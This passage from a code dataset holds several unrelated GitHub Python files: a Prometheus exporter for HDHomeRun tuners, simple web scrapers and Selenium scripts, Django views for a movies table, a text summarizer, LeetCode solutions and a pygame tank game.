labelnames=[\"host\"])\n\t\t\tself.tuners_available = Gauge(namespace=self.namespace, name=f\"tuners_available\", documentation=\"Number of available tuners\", labelnames=[\"host\"])\n\t\t\tself.update_available = Gauge(namespace=self.namespace, name=f\"update_available\", documentation=\"Indicates if there is a system update\", labelnames=[\"host\"])\n\t\t\tself.up = Gauge(namespace=self.namespace, name=\"up\", documentation=\"Indicates if the service is able to be polled\", labelnames=[\"host\", \"service\"])\n\tdef run_metrics_loop(self):\n\t\t\"\"\"Metrics fetching loop\"\"\"\n\n\t\twhile True:\n\t\t\tprint(f\"begin metrics fetch\")\n\t\t\tself.fetch()\n\t\t\ttime.sleep(self.polling_interval_seconds)\n\n\tdef fetch_tuners(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"tuners.html\"), timeout=5)\n\t\t\t\tdata = resp.text\n\t\t\t\tregex = r\"\\s*(?P[^<]+)\\s*(?P[^<]+)\"\n\t\t\t\tinUse = 0\n\t\t\t\ttotalTuners = 0\n\n\t\t\t\tmatches = re.finditer(regex, data, re.MULTILINE)\n\t\t\t\tfor matchNum, match in enumerate(matches, start=1):\n\t\t\t\t\ttotalTuners += 1\n\t\t\t\t\tif match.group(2) != \"not in use\" and match.group(2) != \"none\":\n\t\t\t\t\t\t\tinUse += 1\n\t\t\t\tself.tuners_available_total.labels(host=tuner.hostname).set(totalTuners)\n\t\t\t\tself.tuners_in_use.labels(host=tuner.hostname).set(inUse)\n\t\t\t\tself.tuners_available.labels(host=tuner.hostname).set(totalTuners - inUse)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_tuners\").set(1)\n\t\t\texcept Exception as e:\n\t\t\t\tself.tuners_available_total.labels(host=tuner.hostname).set(0)\n\t\t\t\tself.tuners_in_use.labels(host=tuner.hostname).set(0)\n\t\t\t\tself.tuners_available.labels(host=tuner.hostname).set(0)\n\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_tuners\").set(0)\n\t\t\t\tprint(e)\n\tdef fetch_update_status(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"upgrade_status.json\"), timeout=5)\n\t\t\t\tdata = resp.json()\n\t\t\t\tif \"UpgradeAvailable\" in data:\n\t\t\t\t\tself.update_available.labels(tuner.hostname).set(data[\"UpgradeAvailable\"])\n\t\t\t\telse:\n\t\t\t\t\tself.update_available.labels(tuner.hostname).set(0)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_update_status\").set(1)\n\t\t\texcept Exception as e:\n\t\t\t\tself.update_available.labels(tuner.hostname).set(0)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_update_status\").set(0)\n\t\t\t\tprint(e)\n\tdef fetch_available_channels(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"lineup.json?show=found\"), timeout=5)\n\t\t\t\tdata = resp.json()\n\t\t\t\tself.channels_available_total.labels(tuner.hostname).set(len(data))\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_available_channels\").set(1)\n\t\t\texcept Exception as e:\n\t\t\t\tself.channels_available_total.labels(tuner.hostname).set(0)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_available_channels\").set(0)\n\t\t\t\tprint(e)\n\n\tdef fetch_system_info(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"tuners.html\"), timeout=5)\n\t\t\t\tdata = resp.text\n\t\t\t\tregex = r\"\\s*([^<]+)\\s*([^<]+)\"\n\n\t\t\t\tmatches = re.finditer(regex, data, re.MULTILINE)\n\t\t\t\tfor matchNum, match in enumerate(matches, start=1):\n\n\t\t\t\t\tattr:str = match.group(1)\n\t\t\t\t\tval:str = match.group(2)\n\t\t\t\t\tmodel:str = \"\"\n\t\t\t\t\tfirmware:str = \"\"\n\t\t\t\t\tdeviceId:str = \"\"\n\t\t\t\t\tmacAddr:str = \"\"\n\t\t\t\t\tipAddr:str = \"\"\n\t\t\t\t\tsubnetMask:str = \"\"\n\t\t\t\t\tif attr == \"Hardware Model\":\n\t\t\t\t\t\tmodel = val\n\t\t\t\t\telif attr == \"Firmware Version\":\n\t\t\t\t\t\tfirmware = val\n\t\t\t\t\telif attr == \"Device ID\":\n\t\t\t\t\t\tdeviceId = val\n\t\t\t\t\telif attr == \"MAC Address\":\n\t\t\t\t\t\tmacAddr = val\n\t\t\t\t\telif attr == \"IP Address\":\n\t\t\t\t\t\tipAddr = val\n\t\t\t\t\telif attr == \"Subnet Mask\":\n\t\t\t\t\t\tsubnetMask = val\n\n\t\t\t\t\tsysInfo = DeviceSystemInfo(model=model, firmware=firmware, device_id=deviceId, mac_address=macAddr, ip_address=ipAddr, subnet_mask=subnetMask)\n\t\t\t\t\t\n\t\t\texcept Exception as e:\n\n\t\t\t\tprint(e)\n\n\tdef fetch(self):\n\t\t\"\"\"\n\t\tGet metrics from application and refresh Prometheus metrics with\n\t\tnew values.\n\t\t\"\"\"\n\t\tself.fetch_update_status()\n\t\tself.fetch_available_channels()\n\t\tself.fetch_tuners()\n\n\tdef build_url(self, tuner: TunerConfig, path: str):\n\t\tscheme = \"http\"\n\t\tif tuner.useTls:\n\t\t\tscheme = \"https\"\n\t\treturn f\"{scheme}://{tuner.hostname}/{path}\"\n\ndef dict_get(dictionary, key, default_value = None):\n if key in dictionary.keys():\n return dictionary[key] or default_value\n else:\n return default_value\n\ndef main():\n\t\"\"\"Main entry point\"\"\"\n\tconfig_file = dict_get(os.environ, \"HDHR_CONFIG_FILE\", default_value=\"./config/.hdhomerun.yml\")\n\tprint(f\"Using config file {config_file}\")\n\tsettings = AppConfig(config_file)\n\n\tprint(f\"start listening on :{settings.metrics['port']}\")\n\tapp_metrics = HDHomeRunMetrics(settings)\n\tstart_http_server(settings.metrics['port'])\n\tapp_metrics.run_metrics_loop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"camalot/hdhomerun-exporter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36402229450","text":"from typing import Any, Dict, Literal, Optional\n\n\nclass ImageObject:\n def __init__(\n self,\n url: str,\n size: Literal['X_SMALL', 'SMALL', 'MEDIUM', 'LARGE', 'X_LARGE'] = None,\n description: str = None,\n width=None,\n height=None\n ):\n self.description = description\n self._source = []\n\n base_source = {\n \"url\": url\n }\n if size is not None:\n base_source['size'] = size\n if width is not None:\n base_source['width'] = width\n if height is not None:\n base_source['height'] = height\n self._source.append(base_source)\n\n def to_dict(self):\n response = {\n \"sources\": self._source\n }\n if self.description is not None:\n response['contentDescription'] = self.description\n return response\n\n def add_resource(\n self,\n url: str,\n size: Literal['X_SMALL', 'SMALL', 'MEDIUM', 'LARGE', 'X_LARGE'] = None,\n width=None,\n height=None\n ):\n source = {\n \"url\": url\n }\n if size is not None:\n source['size'] = size\n if width is not None:\n source['width'] = width\n if height is not None:\n source['height'] = height\n self._source.append(source)\n\n def get_resource(\n self, position: int\n ):\n return self._source[position]['url']\n\n def remove_resource(\n self, position: int\n ):\n self._source.pop(position)\n\n\nclass TextObject:\n def __init__(\n self,\n text: str,\n color: str = None,\n display: Literal['none', 'block', 'inline'] = None,\n opacity: float = None,\n align: Literal['left', 'center', 'right'] = None,\n margin: int = None,\n ):\n self.text = text\n self.color = color\n self.style = {}\n if display is not None:\n self.style['display'] = display\n if opacity is not None:\n self.style['opacity'] = opacity\n if align is not None:\n self.style['align'] = align\n if margin is not None:\n self.style['margin'] = \"{0}px\".format(margin)\n\n def to_dict(self) -> Dict[str, Any]:\n response = {\n \"text\": self.text\n }\n if self.color is not None:\n response['color'] = self.color\n if self.style is not {}:\n response['style'] = self.style\n return response\n\n @property\n def display(self) -> Optional[Literal['none', 'block', 'inline']]:\n return self.style.get('display')\n\n @property\n def opacity(self) -> Optional[float]:\n return self.style.get('opacity')\n\n @property\n def align(self) -> Optional[Literal['left', 'center', 'right']]:\n return self.style.get('align')\n\n @property\n def margin(self) -> Optional[str]:\n return self.style.get('margin')\n\n\nclass ButtonObject:\n def __init__(self, text: str, token: str):\n self.text = text\n self.token = token\n\n def to_dict(self) -> Dict[str, str]:\n return {\n \"text\": self.text,\n \"token\": self.token\n }\n\n","repo_name":"gunyu1019/myschool","sub_path":"app/models/nugu/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"75086852266","text":"'''\nCreated on 2019-06-02\n\n@author: F-Monkey\n'''\nfrom scrapy.conf import settings\nimport redis\n\n\ndef save():\n from spider.io.pojo import User\n obj = User(url='1111', nickName='222', sex='F', head='222')\n from spider.io.DB import session\n from spider.io.DB import engine\n from spider.io.DB import Base\n Base.metadata.create_all(engine)\n session.add(obj) # @UndefinedVariable\n session.commit() # @UndefinedVariable\n\n\nr = redis.Redis(host=settings['REDIS_HOST'], port=settings['REDIS_PORT'])\ndef redisTest():\n\n r.lpush('tieba:user_urls','http://tieba.baidu.com/home/main?un=%E8%82%A5%E7%8C%B4%E4%B8%B6&fr=ibaidu&ie=utf-8')\n\ndef redisTest2():\n list_ = r.lrange('tieba:user_urls',0,-1)\n print(list_)\n\ndef printFloat():\n f = 0.01\n print('%f' %f)\n\nif __name__ == '__main__':\n printFloat()","repo_name":"F-Monkey/scrapy_notes","sub_path":"spider/spider/io/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42585694791","text":"import matplotlib.pyplot as plt\nimport csv\nimport sys\nimport re\nfrom collections import OrderedDict\n\nchpl_perf = {}\npy_perf = {}\n\nwith open(sys.argv[1]) as csv_data:\n r = csv.reader(csv_data, delimiter=',')\n header = True\n for row in r:\n if header:\n header = False\n else:\n problem_size = int(re.search(r\"nx=([0-9]+)\", row[1]).group(1)) * int(re.search(r\"ny=([0-9]+)\", row[1]).group(1))\n if row[0] == 'chpl':\n chpl_perf[problem_size] = float(row[-1].strip())\n elif row[0] == 'py':\n py_perf[problem_size] = float(row[-1].strip())\n\nchpl_perf = OrderedDict(sorted(chpl_perf.items()))\npy_perf = OrderedDict(sorted(py_perf.items()))\n\nf1 = plt.figure(1)\nax1 = f1.add_subplot(1, 1, 1)\nax1.plot(chpl_perf.keys(), chpl_perf.values(), label='chpl')\nax1.plot(py_perf.keys(), py_perf.values(), label='py')\nax1.legend()\nax1.set_xlabel(\"Problem Size\")\nax1.set_ylabel(\"Walltime (sec)\")\nax1.set_title(\"Performance Comparison (Chapel vs. Python) - {deets}\".format(deets = sys.argv[2]))\nf1.savefig(\"perf_plots/\" + sys.argv[3] + \".png\")\nf1.show()\n\nf2 = plt.figure(2)\nax2 = f2.add_subplot(1, 1, 1)\nax2.semilogy(chpl_perf.keys(), chpl_perf.values(), label='chpl')\nax2.semilogy(py_perf.keys(), py_perf.values(), label='py')\nax2.legend()\nax2.set_xlabel(\"Problem Size\")\nax2.set_ylabel(\"Walltime (sec) - Log Scale\")\nax2.set_title(\"Performance Comparison (Chapel vs. Python) - {deets}\".format(deets = sys.argv[2]))\nf2.savefig(\"perf_plots/\" + sys.argv[3] + \"_log.png\")\nf2.show()\n","repo_name":"jeremiah-corrado/chapel_barba_navier_stokes","sub_path":"perf_data_plotting.py","file_name":"perf_data_plotting.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4929108562","text":"#imports for summarizer\nimport re\nimport nltk\nimport heapq\nfrom nltk import sent_tokenize, word_tokenize\n\n#imports for gensim\nimport gensim \n\ndef summarizer(article_text, num_sentences):\n\t# Removing Square Brackets and Extra Spaces\n\tarticle_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n\tarticle_text = re.sub(r'\\s+', ' ', article_text)\n\n\t# Removing special characters and digits\n\tformatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )\n\tformatted_article_text = re.sub(r'\\s+', ' ', formatted_article_text)\n\n\tsentence_list = sent_tokenize(article_text)\n\n\n\tstopwords = nltk.corpus.stopwords.words('english')\n\n\tword_frequencies = {}\n\tfor word in word_tokenize(formatted_article_text):\n\t\tif word not in stopwords:\n\t\t if word not in word_frequencies.keys():\n\t\t word_frequencies[word] = 1\n\t\t else:\n\t\t word_frequencies[word] += 1\n\n\tmaximum_frequncy = max(word_frequencies.values())\n\n\tfor word in word_frequencies.keys():\n\t\tword_frequencies[word] = (word_frequencies[word]/maximum_frequncy)\n\n\tsentence_scores = {}\n\tfor sent in sentence_list:\n\t\tfor word in word_tokenize(sent.lower()):\n\t\t\tif word in word_frequencies.keys():\n\t\t\t\tif len(sent.split(' ')) < 30:\n\t\t\t\t\tif sent not in sentence_scores.keys():\n\t\t\t\t\t\tsentence_scores[sent] = word_frequencies[word]\n\t\t\t\t\telse:\n\t\t\t\t\t\tsentence_scores[sent] += word_frequencies[word]\n\n\tsummary_sentences = heapq.nlargest(num_sentences, sentence_scores, key=sentence_scores.get)\n\n\tsummary = ' '.join(summary_sentences)\n\treturn summary\n\ndef textrank(content):\n\tfor ratio in [0.3, 0.5, 0.7]:\n\t summarized_content = gensim.summarization.summarize(content, ratio=ratio)\n\t print('---> Summarized Content (Ratio is %.1f):' % ratio)\n\t print(summarized_content)\n\n\tfor word_count in [10, 30, 50]:\n\t summarized_content = gensim.summarization.summarize(content, word_count=word_count)\n\t print('---> Summarized Content (Word Count is %d):' % word_count)\n\t print(summarized_content)\n","repo_name":"Ro297/Text-Summarizer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13638677578","text":"# encoding=utf-8\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities\n\nlocal_ip = '10.200.1.59'\n\ndriver = webdriver.Remote (command_executor=local_ip + ':4444/wd/hub', desired_capabilities=DesiredCapabilities.CHROME)\n\n# driver.get ('https://my-st1.orangebank.com.cn/corporbank/netLoanIn.do')\n\n# 获取cookie全部内容\ncookie = driver.get_cookies ()\n\ndriver.delete_all_cookies ()\n# 打印全部cookile信息\nprint (cookie)\n# 打印cookie第一组信息\nprint (cookie[0])\n\ndriver.delete_all_cookies ()\n","repo_name":"WangZhenhai/test_flask","sub_path":"src/del_cookies.py","file_name":"del_cookies.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7099015885","text":"import datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\n\naddress = \"https://www.amazon.com/GLEYEMOR-Polarized-Rectangle-Sunglasses-Glasses/dp/B09WTLW8X2/?_encoding=UTF8&pd_rd_w=vrFLr&content-id=amzn1.sym.9d39c3fa-c33a-4f7a-8d61-434712e0d436&pf_rd_p=9d39c3fa-c33a-4f7a-8d61-434712e0d436&pf_rd_r=S187027ZF410HY2BV6Q6&pd_rd_wg=yokIj&pd_rd_r=018363ee-f550-4085-9f01-40bd452abd49&ref_=pd_gw_bmx_gp_20oqmewn\"\n\n#needs in a dict format (key value pairs)\nheader_values = {\n\n 'Accept':\t'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',\n 'Accept-Encoding': \t'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Connection': \t'keep-alive',\n # no need to specify 'Host ':\t'www.amazon.com',\n 'Referer': \t'https://www.google.com/',\n 'Upgrade-Insecure-Requests': \t'1',\n 'User-Agent':\t'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0'\n\n}\n\n\ndef return_desc(address):\n # calling get method of requests library\n response = requests.get(address, headers=header_values)\n # response hasve an attri called text.encode(\"utf-8\") to read the text.\n response_text = response.text.encode(\"utf-8\")\n soup = BeautifulSoup(response_text, 'lxml')\n descs = soup.find_all(\"div\", {\"id\": \"detailBullets_feature_div\"})\n \n \n #[-4].get_text().strip()\n for d in descs:\n desc = d.find(\"span\", text= re.compile(r'B0', re.DOTALL))\n \n print(desc.text)\n\nreturn_desc(address)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"70milan/WebscrapingDQ","sub_path":"csvtest/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30721253489","text":"# Approach 1\n# Own Solution\n# O(M+N), O(M+N)\nclass Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n rev1 = [s.lstrip(\"0\") for s in version1.split(\".\")]\n rev2 = [s.lstrip(\"0\") for s in version2.split(\".\")]\n\n m = min(len(rev1), len(rev2))\n i = 0\n while i < m:\n if rev1[i] == \"\" and rev2[i] == \"\":\n i += 1\n continue\n if rev1[i] == \"\":\n return -1\n if rev2[i] == \"\":\n return 1\n\n if int(rev1[i]) < int(rev2[i]):\n return -1\n if int(rev1[i]) > int(rev2[i]):\n return 1\n i += 1\n\n if len(rev1) < len(rev2):\n while i < len(rev2):\n if rev2[i] != \"\":\n return -1\n i += 1\n\n if len(rev1) > len(rev2):\n while i < len(rev1):\n if rev1[i] != \"\":\n return 1\n i += 1\n\n return 0\n\n\n# Approach 2 - Cleaner code\n# Own Solution\n# O(M+N), O(M+N)\nclass Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n rev1 = version1.split(\".\")\n rev2 = version2.split(\".\")\n\n m, n = len(rev1), len(rev2)\n i, j = 0, 0\n\n # Padding with Zeros\n if m < n:\n rev1 += [0] * (n-m)\n if n < m:\n rev2 += [0] * (m-n)\n\n while i < max(m, n):\n if int(rev1[i]) < int(rev2[j]):\n return -1\n if int(rev1[i]) > int(rev2[j]):\n return 1\n\n i += 1\n j += 1\n\n return 0\n\n# Approach 3\n# O(M+N), O(1)\nclass Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n m, n = len(version1), len(version2)\n i, j = 0, 0\n\n while i < m or j < n:\n n1, n2 = 0, 0\n\n while i < m and version1[i] != \".\":\n n1 = n1 * 10 + int(version1[i])\n i += 1\n\n while j < n and version2[j] != \".\":\n n2 = n2 * 10 + int(version2[j])\n j += 1\n\n if n1 < n2:\n return -1\n if n1 > n2:\n return 1\n i += 1\n j += 1\n\n return 0","repo_name":"nikhiljsk/Strivers_SDE_Sheet","sub_path":"16_String_Part_II/16.6_Compare_version_numbers.py","file_name":"16.6_Compare_version_numbers.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42234171030","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.db import *\nimport psycopg2 as p\nfrom .models import Movies\n\ndef init(request):\n command = \"\"\" \\\nCREATE TABLE IF NOT EXISTS public.ex03_movies\n(\n title character varying(64) NOT NULL,\n episode_nb integer NOT NULL,\n opening_crawl text,\n director character varying(32) NOT NULL,\n producer character varying(128) NOT NULL,\n release_date date NOT NULL,\n CONSTRAINT ex03_movies_pkey PRIMARY KEY (episode_nb),\n unique (episode_nb)\n)\n \"\"\"\n # connect to the PostgreSQL server\n conn = p.connect(host=\"localhost\", database=\"djangoformation\", user=\"djangouser\", password=\"secret\")\n try:\n cur = conn.cursor()\n # create table\n res = cur.execute(command)\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n return HttpResponse(\"OK\")\n except (Exception, p.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n \ndef populate(request):\n try:\n value_list = [ \n (1, 'The Phantom Menace', 'George Lucas', 'Rick McCallum', '1999-05-19'),\n (2, 'Attack of the Clones', 'George Lucas', 'Rick McCallum', '2002-05-16'),\n (3, 'Revenge of the Sith', 'George Lucas', 'Rick McCallum', '2005-05-19'),\n (4, 'A New Hope', 'George Lucas', 'Gary Kurtz, Rick McCallum', '1977-05-25'),\n (5, 'The Empire Strikes Back', 'Irvin Kershner', 'Gary Kutz, Rick McCallum', '1980-05-17'),\n (6, 'Return of the Jedi', 'Richard Marquand', 'Howard G. Kazanjian, George Lucas, Rick McCallum', '1983-05-25'),\n (7, 'The Force Awakens', 'J. J. Abrams', 'Kathleen Kennedy, J. J. Abrams, Bryan Burk', '2015-12-11'),\n ]\n ok = ''\n for record in value_list:\n try:\n old = Movies.objects.get(pk=record[0])\n ok = ok + 'Record (' + record[1] + '):' + \"already exists\" + \"
\"\n except (Movies.DoesNotExist) as error:\n m = Movies(episode_nb=record[0], title=record[1], director=record[2], producer=record[3], release_date=record[4] )\n m.save()\n ok = ok + ' OK
'\n except (Exception, p.DatabaseError) as error:\n ok = ok + 'Error on title(' + record[1] + '):' + str(error.pgcode) + ':' + str(error.pgerror) + \"
\"\n return HttpResponse(ok)\n except (Exception, p.DatabaseError) as error:\n print(error)\n return HttpResponse(\"ERROR\")\n \ndef display(request):\n movies = Movies.objects.all()\n # print(\"movies: {}\".format(movies))\n # print(\"longueur: {}\".format(response.len))\n records = []\n for movie in movies:\n records.append((movie.episode_nb, movie.title, movie.opening_crawl, movie.director, movie.producer, movie.release_date ))\n return render(request, \"display.html\", {'records' : records })","repo_name":"ybaquet/DjangoD05","sub_path":"ex03/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12922290069","text":"import pygame\nimport random\nimport time\nimport os\nfrom pygame import mixer\n\npygame.init()\npygame.font.init()\nwidth, height = 1500, 750\ntank_width, tank_height = 510, 244\nmissile_width, missile_height = 200, 100\nWIN = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Tank War\")\n\n# main_tank\nmain_tank = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank1.png\")), (tank_width, tank_height))\n\n# enemy_tank\nenemy_tank_1 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank2.png\")), (tank_width, tank_height))\nenemy_tank_2 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank3.png\")), (tank_width, tank_height))\nenemy_tank_3 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank4.png\")), (tank_width, tank_height))\nenemy_tank_4 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"tank5.png\")), (tank_width, tank_height))\n\n# tank_missile\nmain_missile = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"missile.png\")),\n (missile_width, missile_height))\nenemy_missile_1 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"missile2.png\")),\n (missile_width, missile_height))\nenemy_missile_2 = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"missile3.png\")),\n (missile_width, missile_height))\n\n# background_image\nbg = pygame.transform.scale(pygame.image.load(os.path.join(\"assets\", \"background.jpg\")), (width, height))\n\n# missile_sound\nmissile_sound = pygame.mixer.Sound(\"sound\\missile.wav\")\n\n# tank moving sound\ntank_moving_sound = pygame.mixer.Sound(\"sound\\Tank.wav\")\n\n# explosion sound\nexplosion_sound = pygame.mixer.Sound(\"sound\\explosion.wav\")\n\n\n# missile\nclass Missile:\n def __init__(self, x, y, img):\n self.x = x\n self.y = y\n self.img = img\n self.mask = pygame.mask.from_surface(self.img)\n\n def draw(self, window):\n window.blit(self.img, (self.x, self.y))\n\n def move(self, vel):\n self.x += vel\n\n def off_screen(self, breadth):\n return not (breadth >= self.x >= 0)\n\n def collision(self, obj):\n return collide(self, obj)\n\n\n# abstract class\nclass Tank:\n COOLDOWN = 100\n\n def __init__(self, x, y, health=100):\n self.x = x\n self.y = y\n self.health = health\n self.tank_img = None\n self.missile_img = None\n self.missiles = []\n self.cool_down_counter = 0\n\n def draw(self, window):\n # pygame.draw.rect(window, (255, 0, 0), (self.x, self.y, 50, 50) )\n window.blit(self.tank_img, (self.x, self.y))\n for missile in self.missiles:\n missile.draw(window)\n\n def move_missile(self, vel, obj):\n self.cooldown()\n for missile in self.missiles:\n\n missile.move(vel)\n if missile.off_screen(width):\n self.missiles.remove(missile)\n elif missile.collision(obj):\n obj.health -= 10\n explosion_sound.play()\n self.missiles.remove(missile)\n\n def cooldown(self):\n if self.cool_down_counter >= self.COOLDOWN:\n self.cool_down_counter = 0\n elif self.cool_down_counter > 0:\n self.cool_down_counter += 1\n\n def shoot(self):\n if self.cool_down_counter == 0:\n missile = Missile(self.x + self.get_width(), self.y + 50, self.missile_img)\n self.missiles.append(missile)\n self.cool_down_counter = 1\n\n def get_width(self):\n return self.tank_img.get_width()\n\n def get_height(self):\n return self.tank_img.get_height()\n\n\nclass Player(Tank):\n score = 0\n\n def __init__(self, x, y, health=100):\n super().__init__(x, y, health)\n self.tank_img = main_tank\n self.missile_img = main_missile\n self.mask = pygame.mask.from_surface(self.tank_img)\n self.max_health = health\n\n def draw(self, window):\n super().draw(window)\n\n def move_missile(self, vel, objs):\n self.cooldown()\n for missile in self.missiles:\n missile.move(vel)\n if missile.off_screen(width):\n self.missiles.remove(missile)\n else:\n for obj in objs:\n if missile.collision(obj):\n self.score += 1\n explosion_sound.play()\n objs.remove(obj)\n if missile in self.missiles:\n self.missiles.remove(missile)\n\n def missile_collision(self, mobjs):\n for missile in self.missiles:\n for obj in mobjs:\n if missile.collision(obj):\n explosion_sound.play()\n mobjs.remove(obj)\n if missile in self.missiles:\n self.missiles.remove(missile)\n\n def draw(self, window):\n super().draw(window)\n self.health_bar(window)\n\n def health_bar(self, window):\n pygame.draw.rect(window, (255, 0, 0),\n (self.x, self.y + self.tank_img.get_height() + 10, self.tank_img.get_width(), 10))\n pygame.draw.rect(window, (0, 255, 0), (\n self.x, self.y + self.tank_img.get_height() + 10,\n self.tank_img.get_width() * (self.health / self.max_health),\n 10))\n\n\nclass Enemy(Tank):\n COLOR_MAP = {\n \"grey\": (enemy_tank_1, enemy_missile_1),\n \"camo\": (enemy_tank_2, enemy_missile_2),\n \"yellow\": (enemy_tank_3, enemy_missile_1),\n \"dark\": (enemy_tank_4, enemy_missile_2)\n }\n\n def __init__(self, x, y, color, health=100):\n super().__init__(x, y, health)\n self.tank_img, self.missile_img = self.COLOR_MAP[color]\n self.mask = pygame.mask.from_surface(self.tank_img)\n\n def move(self, vel):\n self.x -= vel\n\n def shoot(self):\n if self.cool_down_counter == 0:\n missile = Missile(self.x, self.y + 35, self.missile_img)\n self.missiles.append(missile)\n self.cool_down_counter = 1\n\n\ndef collide(obj1, obj2):\n offset_x = obj2.x - obj1.x\n offset_y = obj2.y - obj1.y\n return obj1.mask.overlap(obj2.mask, (offset_x, offset_y)) != None\n\n\ndef main():\n run = True\n FPS = 60\n clock = pygame.time.Clock()\n level = 0\n lives = 5\n player_vel = 2\n enemy_vel = 1\n missile_vel = 2\n enemies = []\n wave_length = 0\n main_font = pygame.font.SysFont(\"comicsans\", 50)\n lost_font = pygame.font.SysFont(\"comicsans\", 70)\n score_font = pygame.font.SysFont(\"comicsans\", 50)\n win_font = pygame.font.SysFont(\"comicsans\", 70)\n player_tank = Player(0, 370)\n lost = False\n win = False\n lost_count = 0\n win_count = 0\n\n def redraw_window():\n WIN.blit(bg, (0, 0))\n level_label = main_font.render(f\"Level: {level}\", 1, (255, 0, 0))\n lives_label = main_font.render(f\"Lives: {lives}\", 1, (255, 0, 0))\n score_label = score_font.render(f\"Score: {player_tank.score}\", 1, (255, 0, 0))\n WIN.blit(level_label, (10, 10))\n WIN.blit(lives_label, (width - level_label.get_width() - 10, 10))\n WIN.blit(score_label, (width / 2 - score_label.get_width() / 2, 10))\n player_tank.draw(WIN)\n for enemy in enemies:\n enemy.draw(WIN) # using draw method in tank class\n\n if win:\n win_label = win_font.render(f\"You Win!!!\", 1, (255, 0, 0))\n WIN.blit(win_label, (width / 2 - win_label.get_width() / 2, height / 2))\n\n if lost:\n lost_label = lost_font.render(f\"You Lost!!!\", 1, (255, 0, 0))\n WIN.blit(lost_label, (width / 2 - lost_label.get_width() / 2, height / 2))\n\n pygame.display.update()\n\n while run:\n clock.tick(FPS)\n redraw_window()\n\n if level == 5:\n win = True\n win_count += 1\n\n if win:\n if win_count > FPS * 3:\n run = False\n else:\n continue\n\n if lives <= 0 or player_tank.health <= 0:\n lost = True\n lost_count += 1\n\n if lost:\n if lost_count > FPS * 3:\n run = False\n else:\n continue\n\n if len(enemies) == 0:\n level += 1\n wave_length += 2\n for i in range(wave_length):\n enemy = Enemy(random.randrange(1500, 3000), 370, random.choice([\"grey\", \"camo\", \"yellow\", \"dark\"]))\n enemies.append(enemy)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_a] and player_tank.x + player_vel > 0: # left\n # tank_moving_sound.play()\n player_tank.x -= player_vel\n\n if keys[pygame.K_d] and player_tank.x + player_vel < width / 2 - player_tank.get_width(): # right\n # tank_moving_sound.play()\n player_tank.x += player_vel\n\n if 